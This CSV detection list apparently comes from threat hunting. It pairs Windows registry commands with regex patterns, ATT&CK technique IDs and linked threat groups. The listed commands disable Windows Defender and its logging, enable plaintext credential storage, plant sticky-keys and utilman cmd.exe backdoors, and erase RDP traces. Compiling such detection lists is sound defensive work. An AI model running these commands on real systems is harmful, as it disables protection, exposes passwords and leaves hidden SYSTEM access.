"*REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet"" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\\SpyNet\""\s\/v\sSubmitSamplesConsent\s\/t\sREG_DWORD\s\/d\s2\s\/f.{0,1000}","greyware_tool_keyword","reg","reduce Windows Defender's ability to block suspicious files and prevent sample submissions to Microsoft","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
"*reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint"" /f /v PackagePointAndPrintOnly /t REG_DWORD /d 1*",".{0,1000}reg\sadd\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sNT\\Printers\\PackagePointAndPrint\""\s\/f\s\/v\sPackagePointAndPrintOnly\s\/t\sREG_DWORD\s\/d\s1.{0,1000}","greyware_tool_keyword","reg","mimikatz command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","BlackSuit - Royal - Black Basta - Akira - Phobos - PLAY - Karakurt - Scattered Spider - AvosLocker - LockBit - Conti - Bassterlord - Quantum - PYSA - NetWalker - GoGoogle - 8BASE - Trigona - Cuba - RansomEXX - BlackCat","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#registry","N/A","10","10","19219","3669","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z"
"*reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint"" /f /v PackagePointAndPrintServerList /t REG_DWORD /d 1*",".{0,1000}reg\sadd\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sNT\\Printers\\PackagePointAndPrint\""\s\/f\s\/v\sPackagePointAndPrintServerList\s\/t\sREG_DWORD\s\/d\s1.{0,1000}","greyware_tool_keyword","reg","mimikatz command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","BlackSuit - Royal - Black Basta - Akira - Phobos - PLAY - Karakurt - Scattered Spider - AvosLocker - LockBit - Conti - Bassterlord - Quantum - PYSA - NetWalker - GoGoogle - 8BASE - Trigona - Cuba - RansomEXX - BlackCat","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#registry","N/A","10","10","19219","3669","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z"
"*reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers"" /f /v 1 /t REG_SZ /d *",".{0,1000}reg\sadd\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sNT\\Printers\\PackagePointAndPrint\\ListofServers\""\s\/f\s\/v\s1\s\/t\sREG_SZ\s\/d\s.{0,1000}","greyware_tool_keyword","reg","mimikatz command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","BlackSuit - Royal - Black Basta - Akira - Phobos - PLAY - Karakurt - Scattered Spider - AvosLocker - LockBit - Conti - Bassterlord - Quantum - PYSA - NetWalker - GoGoogle - 8BASE - Trigona - Cuba - RansomEXX - BlackCat","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#registry","N/A","10","10","19219","3669","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z"
"*reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint"" /f /v RestrictDriverInstallationToAdministrators /t REG_DWORD /d 0*",".{0,1000}reg\sadd\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sNT\\Printers\\PointAndPrint\""\s\/f\s\/v\sRestrictDriverInstallationToAdministrators\s\/t\sREG_DWORD\s\/d\s0.{0,1000}","greyware_tool_keyword","reg","mimikatz command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","BlackSuit - Royal - Black Basta - Akira - Phobos - PLAY - Karakurt - Scattered Spider - AvosLocker - LockBit - Conti - Bassterlord - Quantum - PYSA - NetWalker - GoGoogle - 8BASE - Trigona - Cuba - RansomEXX - BlackCat","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#registry","N/A","10","10","19219","3669","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z"
"*reg add ""HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger"" /v ""Start"" /t REG_DWORD /d ""0"" /f*",".{0,1000}reg\sadd\s\""HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\DefenderApiLogger\""\s\/v\s\""Start\""\s\/t\sREG_DWORD\s\/d\s\""0\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable logging related to Windows Defender","T1070.003 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg add ""HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger"" /v ""Start"" /t REG_DWORD /d ""0"" /f*",".{0,1000}reg\sadd\s\""HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\DefenderAuditLogger\""\s\/v\s\""Start\""\s\/t\sREG_DWORD\s\/d\s\""0\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable logging related to Windows Defender","T1070.003 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg add ""HKLM\System\CurrentControlSet\Services\SecurityHealthService"" /v ""Start"" /t REG_DWORD /d ""4"" /f*",".{0,1000}reg\sadd\s\""HKLM\\System\\CurrentControlSet\\Services\\SecurityHealthService\""\s\/v\s\""Start\""\s\/t\sREG_DWORD\s\/d\s\""4\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable Windows Defender-related services","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg add ""HKLM\System\CurrentControlSet\Services\WdBoot"" /v ""Start"" /t REG_DWORD /d ""4"" /f*",".{0,1000}reg\sadd\s\""HKLM\\System\\CurrentControlSet\\Services\\WdBoot\""\s\/v\s\""Start\""\s\/t\sREG_DWORD\s\/d\s\""4\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable Windows Defender-related services","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg add ""HKLM\System\CurrentControlSet\Services\WdFilter"" /v ""Start"" /t REG_DWORD /d ""4"" /f*",".{0,1000}reg\sadd\s\""HKLM\\System\\CurrentControlSet\\Services\\WdFilter\""\s\/v\s\""Start\""\s\/t\sREG_DWORD\s\/d\s\""4\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable Windows Defender-related services","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg add ""HKLM\System\CurrentControlSet\Services\WdNisDrv"" /v ""Start"" /t REG_DWORD /d ""4"" /f*",".{0,1000}reg\sadd\s\""HKLM\\System\\CurrentControlSet\\Services\\WdNisDrv\""\s\/v\s\""Start\""\s\/t\sREG_DWORD\s\/d\s\""4\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable Windows Defender-related services","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg add ""HKLM\System\CurrentControlSet\Services\WdNisSvc"" /v ""Start"" /t REG_DWORD /d ""4"" /f*",".{0,1000}reg\sadd\s\""HKLM\\System\\CurrentControlSet\\Services\\WdNisSvc\""\s\/v\s\""Start\""\s\/t\sREG_DWORD\s\/d\s\""4\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable Windows Defender-related services","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg add ""HKLM\System\CurrentControlSet\Services\WinDefend"" /v ""Start"" /t REG_DWORD /d ""4"" /f*",".{0,1000}reg\sadd\s\""HKLM\\System\\CurrentControlSet\\Services\\WinDefend\""\s\/v\s\""Start\""\s\/t\sREG_DWORD\s\/d\s\""4\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable Windows Defender-related services","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*REG ADD ""HKLM\SYSTEM\CurrentControlSet\services\WinDefend"" /v Start /t REG_DWORD /d 4 /f*",".{0,1000}REG\sADD\s\""HKLM\\SYSTEM\\CurrentControlSet\\services\\WinDefend\""\s\/v\sStart\s\/t\sREG_DWORD\s\/d\s4\s\/f.{0,1000}","greyware_tool_keyword","reg","disables Windows Defender by setting its start value to 4 (disabled)","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
"*reg add *HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server* /v fDenyTSConnections /t REG_DWORD /d 0 /f*",".{0,1000}reg\sadd\s.{0,1000}HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal\sServer.{0,1000}\s\/v\sfDenyTSConnections\s\/t\sREG_DWORD\s\/d\s0\s\/f.{0,1000}","greyware_tool_keyword","reg","Allowing remote connections to this computer","T1021.001 - T1059.003 - T1112","TA0008 - TA0002","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","N/A","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A"
"*REG ADD *HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe* /t REG_SZ /v Debugger /d *\windows\system32\cmd.exe* /f*",".{0,1000}REG\sADD\s.{0,1000}HKLM\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Image\sFile\sExecution\sOptions\\sethc\.exe.{0,1000}\s\/t\sREG_SZ\s\/v\sDebugger\s\/d\s.{0,1000}\\windows\\system32\\cmd\.exe.{0,1000}\s\/f.{0,1000}","greyware_tool_keyword","reg","Hit F5 a bunch of times when you are at the RDP login screen","T1546.012 - T1059.003 - T1055.001 - T1112","TA0002 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Persistence","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*REG ADD *HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe* /t REG_SZ /v Debugger /d *\windows\system32\cmd.exe* /f*",".{0,1000}REG\sADD\s.{0,1000}HKLM\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Image\sFile\sExecution\sOptions\\utilman\.exe.{0,1000}\s\/t\sREG_SZ\s\/v\sDebugger\s\/d\s.{0,1000}\\windows\\system32\\cmd\.exe.{0,1000}\s\/f.{0,1000}","greyware_tool_keyword","reg","At the login screen press Windows Key+U and you get a cmd.exe window as SYSTEM.","T1546.012 - T1059.003 - T1055.001 - T1112","TA0002 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Persistence","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg add *HKLM\SOFTWARE\Policies\Microsoft\Windows Defender""* /v DisableAntiSpyware /t REG_DWORD /d 1 /f*",".{0,1000}reg\sadd\s.{0,1000}HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\"".{0,1000}\s\/v\sDisableAntiSpyware\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","greyware_tool_keyword","reg","Defense evasion technique disable windows defender","T1562.001 - T1562.002 - T1070.004 - T1112","TA0007 - TA0040 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*reg add *HKLM\Software\Policies\Microsoft\Windows Defender""*/v *DisableAntiSpyware* /t REG_DWORD /d *1* /f*",".{0,1000}reg\sadd\s.{0,1000}HKLM\\Software\\Policies\\Microsoft\\Windows\sDefender\"".{0,1000}\/v\s.{0,1000}DisableAntiSpyware.{0,1000}\s\/t\sREG_DWORD\s\/d\s.{0,1000}1.{0,1000}\s\/f.{0,1000}","greyware_tool_keyword","reg","Disable Real Time Protection","T1562.001 - T1562.002 - T1070.004 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*reg add *HKLM\Software\Policies\Microsoft\Windows Defender* /v *DisableAntiVirus* /t REG_DWORD /d *1* /f*",".{0,1000}reg\sadd\s.{0,1000}HKLM\\Software\\Policies\\Microsoft\\Windows\sDefender.{0,1000}\s\/v\s.{0,1000}DisableAntiVirus.{0,1000}\s\/t\sREG_DWORD\s\/d\s.{0,1000}1.{0,1000}\s\/f.{0,1000}","greyware_tool_keyword","reg","Disable Real Time Protection","T1562.001 - T1562.002 - T1070.004 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*reg add *HKLM\Software\Policies\Microsoft\Windows Defender* /v Disable* /t REG_DWORD /d 1 /f*",".{0,1000}reg\sadd\s.{0,1000}HKLM\\Software\\Policies\\Microsoft\\Windows\sDefender.{0,1000}\s\/v\sDisable.{0,1000}\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","greyware_tool_keyword","reg","Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. disable Microsoft firewall and clear logs.","T1562.001 - T1562.002 - T1070.004 - T1112","TA0007 - TA0040 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*reg add *HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction*",".{0,1000}reg\sadd\s.{0,1000}HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\\Threats\\ThreatIDDefaultAction.{0,1000}","greyware_tool_keyword","reg","Windows Defender Tampering Via registry","T1489 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://www.virustotal.com/gui/file/00820a1f0972678cfe7885bc989ab3e5602b0febc96baf9bf3741d56aa374f03/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg add *HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters* /v EnablePrefetcher /t REG_DWORD /f /d 0*",".{0,1000}reg\sadd\s.{0,1000}HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session\sManager\\Memory\sManagement\\PrefetchParameters.{0,1000}\s\/v\sEnablePrefetcher\s\/t\sREG_DWORD\s\/f\s\/d\s0.{0,1000}","greyware_tool_keyword","reg","Anti forensic - Disabling Prefetch","T1215 - T1562.001 - T1037 - T1112","TA0008","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*reg add *HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger* /v *Start* /t REG_DWORD /d *0* /f*",".{0,1000}reg\sadd\s.{0,1000}HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\DefenderApiLogger.{0,1000}\s\/v\s.{0,1000}Start.{0,1000}\s\/t\sREG_DWORD\s\/d\s.{0,1000}0.{0,1000}\s\/f.{0,1000}","greyware_tool_keyword","reg","Blind ETW Windows Defender: zero out registry values corresponding to its ETW sessions","T1562.001 - T1055.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","7","N/A","N/A","N/A","N/A"
"*reg add *HKLM\System\CurrentControlSet\Services\SecurityHealthService* /v *Start* /t REG_DWORD /d *4* /f*",".{0,1000}reg\sadd\s.{0,1000}HKLM\\System\\CurrentControlSet\\Services\\SecurityHealthService.{0,1000}\s\/v\s.{0,1000}Start.{0,1000}\s\/t\sREG_DWORD\s\/d\s.{0,1000}4.{0,1000}\s\/f.{0,1000}","greyware_tool_keyword","reg","Disable Windows Defender Security Center","T1562.001 - T1055.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d ""0"" /f*",".{0,1000}reg\sadd\sHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\s\/v\sDisableRestrictedAdmin\s\/t\sREG_DWORD\s\/d\s\""0\""\s\/f.{0,1000}","greyware_tool_keyword","reg","This modification can be used to enable or disable the Restricted Admin mode for Remote Desktop Protocol (RDP) which has implications for Lateral Movement and privilege escalation","T1112 - T1021 - T1078 - T1112","TA0005 - TA0006 - TA0008","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Lateral Movement","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f*",".{0,1000}reg\sadd\sHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\s\/v\sDisableRestrictedAdmin\s\/t\sREG_DWORD\s\/d\s0\s\/f.{0,1000}","greyware_tool_keyword","reg","This modification can be used to enable or disable the Restricted Admin mode for Remote Desktop Protocol (RDP) which has implications for Lateral Movement and privilege escalation","T1112 - T1021 - T1078 - T1112","TA0005 - TA0006 - TA0008","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Lateral Movement","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v NoLMHash /t REG_DWORD /d ""0"" /f*",".{0,1000}reg\sadd\sHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\s\/v\sNoLMHash\s\/t\sREG_DWORD\s\/d\s\""0\""\s\/f.{0,1000}","greyware_tool_keyword","reg","This particular change is associated with the handling of LAN Manager (LM) hash storage which can affect the security of password storage on the system. This command can be used as part of credential access or defense evasion techniques","T1112 - T1556 - T1547 - T1112","TA0005 - TA0006","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CryptSvc\Parameters /t REG_EXPAND_SZ /v ServiceDll /d *",".{0,1000}reg\sadd\sHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\CryptSvc\\Parameters\s\/t\sREG_EXPAND_SZ\s\/v\sServiceDll\s\/d\s.{0,1000}","greyware_tool_keyword","reg","Disable Cortex: Change the DLL to a random value","T1547.001 - T1055.001 - T1055.002 - T1112","TA0002 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","N/A","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d /f 1*",".{0,1000}reg\sadd\sHKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\s\/v\sUseLogonCredential\s\/t\sREG_DWORD\s\/d\s\/f\s1.{0,1000}","greyware_tool_keyword","reg","allows the storage of plaintext passwords in memory","T1003.001 - T1112","TA0006 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Credential Access","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f*",".{0,1000}reg\sadd\sHKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\s\/v\sUseLogonCredential\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","greyware_tool_keyword","reg","allows the storage of plaintext passwords in memory","T1003.001 - T1112","TA0006 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Credential Access","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1*",".{0,1000}reg\sadd\sHKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\s\/v\sUseLogonCredential\s\/t\sREG_DWORD\s\/f\s\/d\s1.{0,1000}","greyware_tool_keyword","reg","allows the storage of plaintext passwords in memory","T1003.001 - T1112 - T1112","TA0006 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Credential Access","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg delete ""HKCR\*\shellex\ContextMenuHandlers\EPP"" /f*",".{0,1000}reg\sdelete\s\""HKCR\\.{0,1000}\\shellex\\ContextMenuHandlers\\EPP\""\s\/f.{0,1000}","greyware_tool_keyword","reg","remove the Windows Defender context menu options","T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg delete ""HKCR\Directory\shellex\ContextMenuHandlers\EPP"" /f*",".{0,1000}reg\sdelete\s\""HKCR\\Directory\\shellex\\ContextMenuHandlers\\EPP\""\s\/f.{0,1000}","greyware_tool_keyword","reg","remove the Windows Defender context menu options","T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg delete ""HKCR\Drive\shellex\ContextMenuHandlers\EPP"" /f*",".{0,1000}reg\sdelete\s\""HKCR\\Drive\\shellex\\ContextMenuHandlers\\EPP\""\s\/f.{0,1000}","greyware_tool_keyword","reg","remove the Windows Defender context menu options","T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Reg Delete ""HKCU\software\Microsoft\Windows\CurrentVersion\Run"" /v ""SUPERAntiSpyware"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKCU\\software\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""SUPERAntiSpyware\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543 - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg delete ""HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" /v ""Windows Defender"" /f*",".{0,1000}reg\sdelete\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""Windows\sDefender\""\s\/f.{0,1000}","greyware_tool_keyword","reg","remove Windows Defender from the system tray","T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg delete ""HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"" /va /f*",".{0,1000}reg\sdelete\s\""HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal\sServer\sClient\\Default\""\s\/va\s\/f.{0,1000}","greyware_tool_keyword","reg","delete terminal server client entries from the registry - erasing potential evidence of RDP connections","T1070.004 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/roadwy/DefenderYara/blob/9bbdb7f9fd3513ce30aa69cd1d88830e3cf596ca/Ransom/Win32/Ergop/Ransom_Win32_Ergop_A_.yar#L10","1","0","N/A","N/A","10","10","196","46","2024-07-09T12:37:18Z","2024-02-05T13:57:05Z"
"*reg delete ""HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"" /f*",".{0,1000}reg\sdelete\s\""HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal\sServer\sClient\\Servers\""\s\/f.{0,1000}","greyware_tool_keyword","reg","delete terminal server client entries from the registry - erasing potential evidence of RDP connections","T1070.004 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/roadwy/DefenderYara/blob/9bbdb7f9fd3513ce30aa69cd1d88830e3cf596ca/Ransom/Win32/Ergop/Ransom_Win32_Ergop_A_.yar#L10","1","0","N/A","N/A","10","10","196","46","2024-07-09T12:37:18Z","2024-02-05T13:57:05Z"
"*reg delete ""HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run"" /v ""Windows Defender"" /f*",".{0,1000}reg\sdelete\s\""HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run\""\s\/v\s\""Windows\sDefender\""\s\/f.{0,1000}","greyware_tool_keyword","reg","remove Windows Defender from the system tray","T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
